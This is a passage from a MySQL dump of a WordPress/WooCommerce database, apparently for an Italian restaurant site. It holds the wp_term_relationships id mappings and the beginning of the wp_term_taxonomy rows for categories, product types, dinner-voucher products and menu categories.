  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (17,2,0),(18,2,0),(19,2,0),(43,2,0),(45,2,0),(877,32,0),(56,2,0),(57,2,0),(58,2,0),(59,2,0),(66,2,0),(110,2,0),(111,2,0),(112,2,0),(113,2,0),(878,33,0),(115,2,0),(876,31,0),(117,2,0),(118,2,0),(119,2,0),(120,2,0),(121,2,0),(122,2,0),(123,2,0),(124,2,0),(126,2,0),(127,2,0),(128,2,0),(129,2,0),(130,2,0),(149,2,0),(158,1,0),(176,2,0),(181,1,0),(187,1,0),(211,3,0),(211,7,0),(211,17,0),(213,3,0),(213,7,0),(213,8,0),(213,9,0),(213,17,0),(216,3,0),(216,7,0),(216,17,0),(220,3,0),(220,7,0),(220,17,0),(225,1,0),(244,3,0),(244,7,0),(244,17,0),(283,1,0),(288,3,0),(288,11,0),(435,28,0),(290,3,0),(290,11,0),(290,17,0),(322,3,0),(322,12,0),(630,17,0),(323,3,0),(323,12,0),(323,17,0),(324,3,0),(324,12,0),(325,17,0),(325,3,0),(325,12,0),(327,3,0),(327,13,0),(631,17,0),(328,3,0),(328,13,0),(333,17,0),(329,3,0),(329,13,0),(337,17,0),(330,1,0),(331,3,0),(331,13,0),(334,17,0),(333,3,0),(333,12,0),(334,3,0),(334,13,0),(322,17,0),(337,3,0),(337,13,0),(328,17,0),(474,23,0),(435,24,0),(784,1,0),(472,24,0),(875,8,0),(474,24,0),(475,24,0),(3373,82,0),(482,3,0),(482,14,0),(482,15,0),(482,17,0),(482,26,0),(483,3,0),(483,14,0),(483,15,0),(483,17,0),(483,26,0),(484,3,0),(484,14,0),(484,15,0),(484,17,0),(484,26,0),(485,3,0),(485,14,0),(485,15,0),(485,17,0),(485,26,0),(529,1,0),(548,24,0),(727,1,0),(548,25,0),(554,2,0),(590,1,0),(620,1,0),(630,3,0),(630,12,0),(631,3,0),(631,12,0),(633,3,0),(633,13,0),(324,17,0),(548,28,0),(472,23,0),(435,23,0),(875,27,0),(472,26,0),(875,32,0),(474,28,0),(875,9,0),(875,31,0),(875,33,0),(875,34,0),(875,35,0),(885,2,0),(875,5,0),(909,1,0),(288,17,0),(943,1,0),(879,34,0),(880,35,0),(881,8,0),(882,9,0),(2987,74,0),(2988,74,0),(2989,74,0),(2990,74,0),(2991,74,0),(2992,74,0),(2994,70,0),(2995,70,0),(2996,70,0),(2997,71,0),(2998,71,0),(2999,71,0),(3000,72,0),(3001,72,0),(3002,72,0),(3003,72,0),(3004,72,0),(3005,73,0),(3006,73,0),(3007,73,0),(3008,73,0),(3009,74,0),(3010,74,0),(3011,74,0),(3012,71,0),(3013,71,0),(3014,71,0),(3015,72,0),(3016,73,0),(3017,74,0),(3018,74,0),(3019,74,0),(3020,74,0),(3021,71,0),(3022,71,0),(3023,71,0),(3024,71,0),(3025,74,0),(3026,71,0),(3027,74,0),(3028,70,0),(3029,74,0),(3030,74,0),(3031,73,0),(3032,70,0),(3033,70,0),(3075,48,0),(3075,58,0),(3076,48,0),(3076,58,0),(3077,48,0),(3078,44,0),(3078,49,0),(3079,44,0),(3079,49,0),(3080,44,0),(3080,49,0),(3081,44,0),(3081,49,0),(3082,44,0),(3082,49,0),(3083,44,0),(3083,49,0),(618,52,0),(618,58,0),(3084,52,0),(3084,58,0),(3085,52,0),(3086,49,0),(3086,52,0),(3087,49,0),(3087,52,0),(3088,52,0),(3088,58,0),(3089,52,0),(3089,58,0),(3090,52,0),(3090,58,0),(3091,52,0),(3091,58,0),(3092,42,0),(3092,58,0),(3093,42,0),(3093,58,0),(3094,42,0),(3095,54,0),(3095,58,0),(3096,54,0),(3097,49,0),(3097,54,0),(3098,49,0),(3098,54,0),(3099,51,0),(3099,58,0),(3100,49,0),(3100,60,0),(3101,51,0),(3102,51,0),(3102,58,0),(2344,51,0),(2344,58,0),(2345,49,0),(2345,51,0),(2898,44,0),(2898,49,0),(2899,44,0),(2899,49,0),(2900,44,0),(2900,49,0),(2901,44,0),(2901,49,0),(2902,44,0),(2902,49,0),(2903,44,0),(2903,49,0),(2930,49,0),(2930,56,0),(3103,49,0),(3722,74,0),(3103,51,0),(3104,51,0),(3984,80,0),(3723,74,0),(3724,74,0),(3725,74,0),(3726,74,0),(3985,80,0),(2931,56,0),(2931,58,0),(2932,56,0),(2932,58,0),(2933,56,0),(2934,56,0),(2934,58,0),(2935,49,0),(2935,56,0),(2936,56,0),(2936,58,0),(2937,58,0),(2937,60,0),(2938,56,0),(2938,58,0),(2939,56,0),(2939,58,0),(2940,56,0),(2940,58,0),(2941,49,0),(2941,56,0),(3395,74,0),(2942,56,0),(3106,21,0),(3990,74,0),(3106,3,0),(3106,59,0),(3106,66,0),(98,57,0),(98,21,0),(98,3,0),(98,65,0),(3107,22,0),(3107,3,0),(3107,63,0),(3107,68,0),(3108,57,0),(3108,17,0),(3108,20,0),(3108,3,0),(3108,67,0),(3109,22,0),(3109,3,0),(3109,63,0),(3109,65,0),(3110,21,0),(3110,3,0),(3110,59,0),(3110,69,0),(3111,57,0),(3111,21,0),(3111,3,0),(3111,65,0),(177,22,0),(177,3,0),(177,59,0),(177,68,0),(180,47,0),(180,22,0),(180,3,0),(180,66,0),(3112,47,0),(3112,20,0),(3112,3,0),(3112,69,0),(3113,22,0),(3113,3,0),(3113,59,0),(3113,68,0),(3114,47,0),(3114,18,0),(3114,3,0),(3114,67,0),(3115,20,0),(3755,71,0),(3756,71,0),(3761,74,0),(3762,70,0),(3749,72,0),(3750,73,0),(3743,74,0),(3744,74,0),(3737,72,0),(3738,72,0),(3728,70,0),(3727,74,0),(3115,3,0),(3115,63,0),(3115,69,0),(3116,57,0),(3116,21,0),(3116,3,0),(3116,69,0),(3117,22,0),(3117,3,0),(3117,63,0),(3117,66,0),(3118,22,0),(3118,3,0),(3118,59,0),(3118,69,0),(3119,47,0),(3119,21,0),(3119,3,0),(3119,67,0),(3120,22,0),(3120,3,0),(3120,63,0),(3120,66,0),(3121,57,0),(3121,21,0),(3121,3,0),(3121,67,0),(3122,47,0),(3122,21,0),(3122,3,0),(3122,65,0),(528,47,0),(528,20,0),(528,3,0),(528,65,0),(530,22,0),(530,3,0),(530,59,0),(530,68,0),(3123,17,0),(3123,22,0),(3123,3,0),(3123,63,0),(3123,67,0),(3124,57,0),(3124,22,0),(3124,3,0),(3124,68,0),(3125,21,0),(3125,3,0),(3125,59,0),(3125,65,0),(3126,57,0),(3126,3,0),(3126,66,0),(3127,45,0),(3128,45,0),(3129,45,0),(3130,46,0),(3131,45,0),(3132,45,0),(3133,45,0),(3134,45,0),(3135,53,0),(3136,53,0),(3137,53,0),(3138,53,0),(3139,53,0),(3140,53,0),(3141,53,0),(3142,53,0),(3143,53,0),(3144,40,0),(3145,40,0),(3146,40,0),(3147,40,0),(3148,40,0),(3149,40,0),(3150,40,0),(3151,40,0),(1346,40,0),(3152,61,0),(3153,61,0),(603,61,0),(1348,41,0),(1349,41,0),(1350,64,0),(1351,64,0),(1352,64,0),(1353,64,0),(1354,64,0),(1355,43,0),(1356,43,0),(1357,43,0),(1358,43,0),(1360,39,0),(1361,39,0),(1362,39,0),(1363,39,0),(2904,61,0),(2906,61,0),(2905,61,0),(3156,74,0),(3157,74,0),(3158,74,0),(3159,74,0),(3160,74,0),(3161,74,0),(3162,71,0),(3163,71,0),(3164,71,0),(3165,71,0),(3166,71,0),(3167,72,0),(3168,73,0),(3169,74,0),(3170,74,0),(3171,70,0),(3172,70,0),(3173,71,0),(3174,73,0),(3175,74,0),(3176,74,0),(3177,70,0),(3178,71,0),(3179,71,0),(3180,71,0),(3181,73,0),(3182,74,0),(3183,74,0),(3184,74,0),(3185,70,0),(3186,70,0),(3187,70,0),(3188,70,0),(3189,70,0),(3190,73,0),(3191,73,0),(3192,72,0),(3193,70,0),(3194,74,0),(3195,70,0),(3196,73,0),(3197,74,0),(3198,70,0),(3199,70,0),(3200,74,0),(3201,70,0),(3202,70,0),(3203,70,0),(3204,70,0),(3205,70,0),(3206,74,0),(3207,72,0),(3208,74,0),(3209,74,0),(3210,74,0),(3211,74,0),(3212,74,0),(3213,74,0),(3214,74,0),(3215,70,0),(3216,74,0),(3217,74,0),(3218,74,0),(3219,74,0),(3220,71,0),(3221,71,0),(3222,71,0),(3223,71,0),(3224,74,0),(3225,74,0),(3226,71,0),(3227,71,0),(3228,71,0),(3229,71,0),(3230,74,0),(3231,74,0),(3232,74,0),(3233,74,0),(3234,71,0),(3235,71,0),(3236,74,0),(3237,74,0),(3238,71,0),(3239,71,0),(3240,71,0),(3241,74,0),(3242,74,0),(3243,74,0),(3765,73,0),(3731,71,0),(3745,74,0),(3757,71,0),(3751,74,0),(3739,73,0),(3250,74,0),(3251,71,0),(3252,74,0),(3253,71,0),(3254,72,0),(3255,72,0),(3256,74,0),(3257,74,0),(3258,71,0),(3259,71,0),(3260,72,0),(3261,72,0),(3262,72,0),(3263,72,0),(3264,72,0),(3265,72,0),(3266,72,0),(3267,72,0),(3764,74,0),(3730,70,0),(3763,74,0),(3729,70,0),(3272,73,0),(3273,73,0),(3274,73,0),(3275,73,0),(3276,73,0),(3277,71,0),(3278,71,0),(3279,74,0),(3280,74,0),(3281,71,0),(3282,74,0),(3283,74,0),(3284,71,0),(3285,74,0),(3286,74,0),(3287,74,0),(3288,74,0),(3289,74,0),(3290,74,0),(3291,74,0),(3292,74,0),(3293,74,0),(3294,74,0),(3295,71,0),(3296,71,0),(3297,74,0),(3298,74,0),(3299,71,0),(3300,71,0),(3766,70,0),(3732,71,0),(3746,71,0),(3758,71,0),(3752,74,0),(3740,73,0),(3307,74,0),(3308,73,0),(3309,70,0),(3310,70,0),(3311,70,0),(3312,70,0),(3313,70,0),(3314,71,0),(3315,74,0),(3316,73,0),(3317,71,0),(3318,71,0),(3319,74,0),(3320,74,0),(3321,74,0),(3322,70,0),(3323,73,0),(3324,74,0),(3325,74,0),(3326,74,0),(3327,74,0),(3328,70,0),(3329,70,0),(3330,70,0),(3331,70,0),(3332,70,0),(3333,74,0),(3334,74,0),(3335,71,0),(3336,71,0),(3337,71,0),(3338,74,0),(3339,74,0),(3340,74,0),(3341,74,0),(3342,73,0),(3343,73,0),(3344,70,0),(3345,70,0),(3346,70,0),(3347,70,0),(3348,70,0),(3349,74,0),(3350,70,0),(3351,70,0),(3352,74,0),(3353,74,0),(3354,70,0),(3355,74,0),(3356,70,0),(3382,81,0),(3384,81,0),(3383,81,0),(3379,80,0),(3380,80,0),(3989,74,0),(3388,83,0),(3389,84,0),(3390,85,0),(3390,86,0),(3389,87,0),(3388,88,0),(3444,74,0),(3396,74,0),(3397,74,0),(3398,74,0),(3399,74,0),(3400,74,0),(3401,70,0),(3402,70,0),(3403,70,0),(3404,71,0),(3405,71,0),(3406,71,0),(3407,72,0),(3408,72,0),(3409,72,0),(3410,72,0),(3411,72,0),(3412,73,0),(3413,73,0),(3414,73,0),(3415,73,0),(3416,74,0),(3417,74,0),(3418,74,0),(3419,71,0),(3420,71,0),(3421,71,0),(3422,72,0),(3423,73,0),(3424,74,0),(3425,74,0),(3426,74,0),(3427,74,0),(3428,71,0),(3429,71,0),(3430,71,0),(3431,71,0),(3432,74,0),(3433,71,0),(3434,74,0),(3435,70,0),(3436,74,0),(3437,74,0),(3438,73,0),(3439,70,0),(3440,70,0),(3442,49,0),(3442,51,0),(3443,51,0),(2942,49,0),(3445,74,0),(3446,74,0),(3447,74,0),(3448,74,0),(3449,74,0),(3450,71,0),(3451,71,0),(3452,71,0),(3453,71,0),(3454,71,0),(3455,72,0),(3456,73,0),(3457,74,0),(3458,74,0),(3459,70,0),(3460,70,0),(3461,71,0),(3462,73,0),(3463,74,0),(3464,74,0),(3465,70,0),(3466,71,0),(3467,71,0),(3468,71,0),(3469,73,0),(3470,74,0),(3471,74,0),(3472,74,0),(3473,70,0),(3474,70,0),(3475,70,0),(3476,70,0),(3477,70,0),(3478,73,0),(3479,73,0),(3480,72,0),(3481,70,0),(3482,74,0),(3483,70,0),(3484,73,0),(3485,74,0),(3486,70,0),(3487,70,0),(3488,74,0),(3489,70,0),(3490,70,0),(3491,70,0),(3492,70,0),(3493,70,0),(3494,74,0),(3495,72,0),(3496,74,0),(3497,74,0),(3498,74,0),(3499,74,0),(3500,74,0),(3501,74,0),(3502,74,0),(3503,70,0),(3504,74,0),(3505,74,0),(3506,74,0),(3507,74,0),(3508,71,0),(3509,71,0),(3510,71,0),(3511,71,0),(3512,74,0),(3513,74,0),(3514,71,0),(3515,71,0),(3516,71,0),(3517,71,0),(3518,74,0),(3519,74,0),(3520,74,0),(3521,74,0),(3522,71,0),(3523,71,0),(3524,74,0),(3525,74,0),(3526,71,0),(3527,71,0),(3528,71,0),(3529,74,0),(3530,74,0),(3531,74,0),(3767,70,0),(3733,71,0),(3747,71,0),(3759,74,0),(3753,74,0),(3741,73,0),(3538,74,0),(3539,71,0),(3540,74,0),(3541,71,0),(3542,72,0),(3543,72,0),(3544,74,0),(3545,74,0),(3546,71,0),(3547,71,0),(3548,72,0),(3549,72,0),(3550,72,0),(3551,72,0),(3552,72,0),(3553,72,0),(3554,72,0),(3555,72,0),(1,38,0),(3735,72,0),(3991,74,0),(3734,72,0),(3560,73,0),(3561,73,0),(3562,73,0),(3563,73,0),(3564,73,0),(3565,71,0),(3566,71,0),(3567,74,0),(3568,74,0),(3569,71,0),(3570,74,0),(3571,74,0),(3572,71,0),(3573,74,0),(3574,74,0),(3575,74,0),(3576,74,0),(3577,74,0),(3578,74,0),(3579,74,0),(3580,74,0),(3581,74,0),(3582,74,0),(3583,71,0),(3584,71,0),(3585,74,0),(3586,74,0),(3587,71,0),(3588,71,0),(3992,74,0),(3736,72,0),(3748,71,0),(3760,71,0),(3754,74,0),(3742,73,0),(3595,74,0),(3596,73,0),(3597,70,0),(3598,70,0),(3599,70,0),(3600,70,0),(3601,70,0),(3602,71,0),(3603,74,0),(3604,73,0),(3605,71,0),(3606,71,0),(3607,74,0),(3608,74,0),(3609,74,0),(3610,70,0),(3611,73,0),(3612,74,0),(3613,74,0),(3614,74,0),(3615,74,0),(3616,70,0),(3617,70,0),(3618,70,0),(3619,70,0),(3620,70,0),(3621,74,0),(3622,74,0),(3623,71,0),(3624,71,0),(3625,71,0),(3626,74,0),(3627,74,0),(3628,74,0),(3629,74,0),(3630,73,0),(3631,73,0),(3632,70,0),(3633,70,0),(3634,70,0),(3635,70,0),(3636,70,0),(3637,74,0),(3638,70,0),(3639,70,0),(3640,74,0),(3641,74,0),(3642,70,0),(3643,74,0),(3644,70,0),(3676,2,0),(3771,74,0),(1446,36,0),(1454,36,0),(1459,36,0),(1462,36,0),(3770,37,0),(1670,75,0),(1670,37,0),(1671,76,0),(1671,37,0),(1677,77,0),(1677,37,0),(1681,78,0),(1681,37,0),(1685,79,0),(1685,37,0),(1688,37,0),(1693,37,0),(3772,74,0),(3773,74,0),(3774,74,0),(3775,74,0),(3776,74,0),(3777,71,0),(3778,71,0),(3779,71,0),(3780,71,0),(3781,71,0),(3782,72,0),(3783,73,0),(3784,74,0),(3785,74,0),(3786,70,0),(3787,70,0),(3788,71,0),(3789,73,0),(3790,74,0),(3791,74,0),(3792,70,0),(3793,71,0),(3794,71,0),(3795,71,0),(3796,73,0),(3797,74,0),(3798,74,0),(3799,74,0),(3800,70,0),(3801,70,0),(3802,70,0),(3803,70,0),(3804,70,0),(3805,73,0),(3806,73,0),(3807,72,0),(3808,70,0),(3809,74,0),(3810,70,0),(3811,73,0),(3812,74,0),(3813,70,0),(3814,70,0),(3815,74,0),(3816,70,0),(3817,70,0),(3818,70,0),(3819,70,0),(3820,70,0),(3821,74,0),(3822,72,0),(3823,74,0),(3824,74,0),(3825,74,0),(3826,74,0),(3827,74,0),(3828,74,0),(3829,74,0),(3830,70,0),(3831,74,0),(3832,74,0),(3833,74,0),(3834,74,0),(3835,71,0),(3836,71,0),(3837,71,0),(3838,71,0),(3839,74,0),(3840,74,0),(3841,71,0),(3842,71,0),(3843,71,0),(3844,71,0),(3845,74,0),(3846,74,0),(3847,74,0),(3848,74,0),(3849,71,0),(3850,71,0),(3851,74,0),(3852,74,0),(3853,71,0),(3854,71,0),(3855,71,0),(3856,74,0),(3857,74,0),(3858,74,0),(3859,74,0),(3860,74,0),(3861,74,0),(3862,74,0),(3863,74,0),(3864,74,0),(3865,74,0),(3866,71,0),(3867,74,0),(3868,71,0),(3869,72,0),(3870,72,0),(3871,74,0),(3872,74,0),(3873,71,0),(3874,71,0),(3875,72,0),(3876,72,0),(3877,72,0),(3878,72,0),(3879,72,0),(3880,72,0),(3881,72,0),(3882,72,0),(3883,72,0),(3884,72,0),(3885,73,0),(3886,73,0),(3887,73,0),(3888,73,0),(3889,73,0),(3890,73,0),(3891,73,0),(3892,71,0),(3893,71,0),(3894,74,0),(3895,74,0),(3896,71,0),(3897,74,0),(3898,74,0),(3899,71,0),(3900,74,0),(3901,74,0),(3902,74,0),(3903,74,0),(3904,74,0),(3905,74,0),(3906,74,0),(3907,74,0),(3908,74,0),(3909,74,0),(3910,71,0),(3911,71,0),(3912,74,0),(3913,74,0),(3914,71,0),(3915,71,0),(3916,71,0),(3917,71,0),(3918,71,0),(3919,71,0),(3920,71,0),(3921,71,0),(3922,74,0),(3923,73,0),(3924,70,0),(3925,70,0),(3926,70,0),(3927,70,0),(3928,70,0),(3929,71,0),(3930,74,0),(3931,73,0),(3932,71,0),(3933,71,0),(3934,74,0),(3935,74,0),(3936,74,0),(3937,70,0),(3938,73,0),(3939,74,0),(3940,74,0),(3941,74,0),(3942,74,0),(3943,70,0),(3944,70,0),(3945,70,0),(3946,70,0),(3947,70,0),(3948,74,0),(3949,74,0),(3950,71,0),(3951,71,0),(3952,71,0),(3953,74,0),(3954,74,0),(3955,74,0),(3956,74,0),(3957,73,0),(3958,73,0),(3959,70,0),(3960,70,0),(3961,70,0),(3962,70,0),(3963,70,0),(3964,74,0),(3965,70,0),(3966,70,0),(3967,74,0),(3968,74,0),(3969,70,0),(3970,74,0),(3971,70,0),(3993,74,0),(3994,74,0),(3995,70,0),(3996,70,0),(3997,70,0),(3998,71,0),(3999,71,0),(4000,71,0),(4001,72,0),(4002,72,0),(4003,72,0),(4004,72,0),(4005,72,0),(4006,73,0),(4007,73,0),(4008,73,0),(4009,73,0),(4010,74,0),(4011,74,0),(4012,74,0),(4013,71,0),(4014,71,0),(4015,71,0),(4016,72,0),(4017,73,0),(4018,74,0),(4019,74,0),(4020,74,0),(4021,74,0),(4022,71,0),(4023,71,0),(4024,71,0),(4025,71,0),(4026,74,0),(4027,71,0),(4028,74,0),(4029,70,0),(4030,74,0),(4031,74,0),(4032,73,0),(4033,70,0),(4034,70,0),(475,28,0),(4038,74,0),(4039,74,0),(4040,74,0),(4041,74,0),(4042,74,0),(4043,74,0),(4044,71,0),(4045,71,0),(4046,71,0),(4047,71,0),(4048,71,0),(4049,72,0),(4050,73,0),(4051,74,0),(4052,74,0),(4053,70,0),(4054,70,0),(4055,71,0),(4056,73,0),(4057,74,0),(4058,74,0),(4059,70,0),(4060,71,0),(4061,71,0),(4062,71,0),(4063,73,0),(4064,74,0),(4065,74,0),(4066,74,0),(4067,70,0),(4068,70,0),(4069,70,0),(4070,70,0),(4071,70,0),(4072,73,0),(4073,73,0),(4074,72,0),(4075,70,0),(4076,74,0),(4077,70,0),(4078,73,0),(4079,74,0),(4080,70,0),(4081,70,0),(4082,74,0),(4083,70,0),(4084,70,0),(4085,70,0),(4086,70,0),(4087,70,0),(4088,74,0),(4089,72,0),(4090,74,0),(4091,74,0),(4092,74,0),(4093,74,0),(4094,74,0),(4095,74,0),(4096,74,0),(4097,70,0),(4098,74,0),(4099,74,0),(4100,74,0),(4101,74,0),(4102,71,0),(4103,71,0),(4104,71,0),(4105,71,0),(4106,74,0),(4107,74,0),(4108,71,0),(4109,71,0),(4110,71,0),(4111,71,0),(4112,74,0),(4113,74,0),(4114,74,0),(4115,74,0),(4116,71,0),(4117,71,0),(4118,74,0),(4119,74,0),(4120,71,0),(4121,71,0),(4122,71,0),(4123,74,0),(4124,74,0),(4125,74,0),(4126,74,0),(4127,74,0),(4128,74,0),(4129,74,0),(4130,74,0),(4131,74,0),(4132,74,0),(4133,71,0),(4134,74,0),(4135,71,0),(4136,72,0),(4137,72,0),(4138,74,0),(4139,74,0),(4140,71,0),(4141,71,0),(4142,72,0),(4143,72,0),(4144,72,0),(4145,72,0),(4146,72,0),(4147,72,0),(4148,72,0),(4149,72,0),(4150,72,0),(4151,72,0),(4152,73,0),(4153,73,0),(4154,73,0),(4155,73,0),(4156,73,0),(4157,73,0),(4158,73,0),(4159,71,0),(4160,71,0),(4161,74,0),(4162,74,0),(4163,71,0),(4164,74,0),(4165,74,0),(4166,71,0),(4167,74,0),(4168,74,0),(4169,74,0),(4170,74,0),(4171,74,0),(4172,74,0),(4173,74,0),(4174,74,0),(4175,74,0),(4176,74,0),(4177,71,0),(4178,71,0),(4179,74,0),(4180,74,0),(4181,71,0),(4182,71,0),(4183,71,0),(4184,71,0),(4185,71,0),(4186,71,0),(4187,71,0),(4188,71,0),(4189,74,0),(4190,73,0),(4191,70,0),(4192,70,0),(4193,70,0),(4194,70,0),(4195,70,0),(4196,71,0),(4197,74,0),(4198,73,0),(4199,71,0),(4200,71,0),(4201,74,0),(4202,74,0),(4203,74,0),(4204,70,0),(4205,73,0),(4206,74,0),(4207,74,0),(4208,74,0),(4209,74,0),(4210,70,0),(4211,70,0),(4212,70,0),(4213,70,0),(4214,70,0),(4215,74,0),(4216,74,0),(4217,71,0),(4218,71,0),(4219,71,0),(4220,74,0),(4221,74,0),(4222,74,0),(4223,74,0),(4224,73,0),(4225,73,0),(4226,70,0),(4227,70,0),(4228,70,0),(4229,70,0),(4230,70,0),(4231,74,0),(4232,70,0),(4233,70,0),(4234,74,0),(4235,74,0),(4236,70,0),(4237,74,0),(4238,70,0),(4348,74,0),(4349,74,0),(4350,74,0),(4351,74,0),(4352,74,0),(4353,74,0),(4354,70,0),(4355,70,0),(4356,70,0),(4357,71,0),(4358,71,0),(4359,71,0),(4360,72,0),(4361,72,0),(4362,72,0),(4363,72,0),(4364,72,0),(4365,73,0),(4366,73,0),(4367,73,0),(4368,73,0),(4369,74,0),(4370,74,0),(4371,74,0),(4372,71,0),(4373,71,0),(4374,71,0),(4375,72,0),(4376,73,0),(4377,74,0),(4378,74,0),(4379,74,0),(4380,74,0),(4381,71,0),(4382,71,0),(4383,71,0),(4384,71,0),(4385,74,0),(4386,71,0),(4387,74,0),(4388,70,0),(4389,74,0),(4390,74,0),(4391,73,0),(4392,70,0),(4393,70,0),(4394,74,0),(4395,74,0),(4396,74,0),(4397,74,0),(4398,74,0),(4399,74,0),(4400,71,0),(4401,71,0),(4402,71,0),(4403,71,0),(4404,71,0),(4405,72,0),(4406,73,0),(4407,74,0),(4408,74,0),(4409,70,0),(4410,70,0),(4411,71,0),(4412,73,0),(4413,74,0),(4414,74,0),(4415,70,0),(4416,71,0),(4417,71,0),(4418,71,0),(4419,73,0),(4420,74,0),(4421,74,0),(4422,74,0),(4423,70,0),(4424,70,0),(4425,70,0),(4426,70,0),(4427,70,0),(4428,73,0),(4429,73,0),(4430,72,0),(4431,70,0),(4432,74,0),(4433,70,0),(4434,73,0),(4435,74,0),(4436,70,0),(4437,70,0),(4438,74,0),(4439,70,0),(4440,70,0),(4441,70,0),(4442,70,0),(4443,70,0),(4444,74,0),(4445,72,0),(4446,74,0),(4447,74,0),(4448,74,0),(4449,74,0),(4450,74,0),(4451,74,0),(4452,74,0),(4453,70,0),(4454,74,0),(4455,74,0),(4456,74,0),(4457,74,0),(4458,71,0),(4459,71,0),(4460,71,0),(4461,71,0),(4462,74,0),(4463,74,0),(4464,71,0),(4465,71,0),(4466,71,0),(4467,71,0),(4468,74,0),(4469,74,0),(4470,74,0),(4471,74,0),(4472,71,0),(4473,71,0),(4474,74,0),(4475,74,0),(4476,71,0),(4477,71,0),(4478,71,0),(4479,74,0),(4480,74,0),(4481,74,0),(4482,74,0),(4483,74,0),(4484,74,0),(4485,74,0),(4486,74,0),(4487,74,0),(4488,74,0),(4489,71,0),(4490,74,0),(4491,71,0),(4492,72,0),(4493,72,0),(4494,74,0),(4495,74,0),(4496,71,0),(4497,71,0),(4498,72,0),(4499,72,0),(4500,72,0),(4501,72,0),(4502,72,0),(4503,72,0),(4504,72,0),(4505,72,0),(4506,72,0),(4507,72,0),(4508,73,0),(4509,73,0),(4510,73,0),(4511,73,0),(4512,73,0),(4513,73,0),(4514,73,0),(4515,71,0),(4516,71,0),(4517,74,0),(4518,74,0),(4519,71,0),(4520,74,0),(4521,74,0),(4522,71,0),(4523,74,0),(4524,74,0),(4525,74,0),(4526,74,0),(4527,74,0),(4528,74,0),(4529,74,0),(4530,74,0),(4531,74,0),(4532,74,0),(4533,71,0),(4534,71,0),(4535,74,0),(4536,74,0),(4537,71,0),(4538,71,0),(4539,71,0),(4540,71,0),(4541,71,0),(4542,71,0),(4543,71,0),(4544,71,0),(4545,74,0),(4546,73,0),(4547,70,0),(4548,70,0),(4549,70,0),(4550,70,0),(4551,70,0),(4552,71,0),(4553,74,0),(4554,73,0),(4555,71,0),(4556,71,0),(4557,74,0),(4558,74,0),(4559,74,0),(4560,70,0),(4561,73,0),(4562,74,0),(4563,74,0),(4564,74,0),(4565,74,0),(4566,70,0),(4567,70,0),(4568,70,0),(4569,70,0),(4570,70,0),(4571,74,0),(4572,74,0),(4573,71,0),(4574,71,0),(4575,71,0),(4576,74,0),(4577,74,0),(4578,74,0),(4579,74,0),(4580,73,0),(4581,73,0),(4582,70,0),(4583,70,0),(4584,70,0),(4585,70,0),(4586,70,0),(4587,74,0),(4588,70,0),(4589,70,0),(4590,74,0),(4591,74,0),(4592,70,0),(4593,74,0),(4594,70,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=90 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,13),(2,2,'nav_menu','',0,33),(3,3,'product_type','',0,41),(4,4,'product_type','',0,0),(5,5,'product_type','',0,1),(6,6,'product_type','',0,0),(7,7,'product_cat','',0,0),(8,8,'pa_numero-coperti','2 persone',0,1),(9,9,'pa_numero-coperti','3 persone',0,1),(10,10,'product_cat','',0,0),(11,11,'product_cat','',0,1),(12,12,'product_cat','',0,7),(13,13,'product_cat','',0,7),(14,14,'product_visibility','',0,0),(15,15,'product_visibility','',0,0),(16,16,'product_visibility','',0,0),(17,17,'product_visibility','',0,13),(18,18,'product_visibility','',0,1),(19,19,'product_visibility','',0,0),(20,20,'product_visibility','',0,4),(21,21,'product_visibility','',0,9),(22,22,'product_visibility','',0,11),(23,23,'product_cat','Acquista un buono cena, regala una cena (invia il buono o stampalo come idea regalo)',0,3),(24,24,'product_type','',0,5),(25,25,'product_cat','',0,1),(26,26,'product_cat','',0,1),(27,27,'product_cat','',0,1),(28,28,'product_cat','',0,4),(29,29,'action-group','',0,0),(30,30,'action-group','',0,0),(31,31,'pa_numero-coperti','',0,1),(32,32,'pa_numero-coperti','',0,1),(33,33,'pa_numero-coperti','',0,1),(34,34,'pa_numero-coperti','',0,1),(35,35,'pa_numero-coperti','',0,1),(36,36,'category','',0,4),(37,37,'category','',0,8),(38,38,'category','',0,1),(39,39,'restaurant-menu-category','',0,4),(40,40,'restaurant-menu-category','',0,9),(41,41,'restaurant-menu-category','',0,2),(42,42,'portfolio-category','',0,3),(43,43,'restaurant-menu-category','',0,4),(44,44,'portfolio-category','',0,12),(45,45,'restaurant-menu-category','',0,7),(46,46,'restaurant-menu-category','',0,1),(47,47,'product_tag','',0,6),(48,48,'portfolio-category','',0,3),(49,49,'portfolio-tag','',0,22),(50,50,'portfolio-category','',0,0),(51,51,'portfolio-category','',0,5),(52,52,'portfolio-category','',50,9),(53,53,'restaurant-menu-category','',0,9),(54,54,'portfolio-category','',50,4),(55,55,'restaurant-menu-category','',0,0),(56,56,'portfolio-category','',50,12),(57,57,'product_tag','',0,7),(58,58,'portfolio-tag','',0,22),(59,59,'product_tag','',0,7),(60,60,'portfolio-category','',50,2),(61,61,'testimonials-category','',0,6),(62,62,'product_cat','',0,0),(63,63,'product_tag'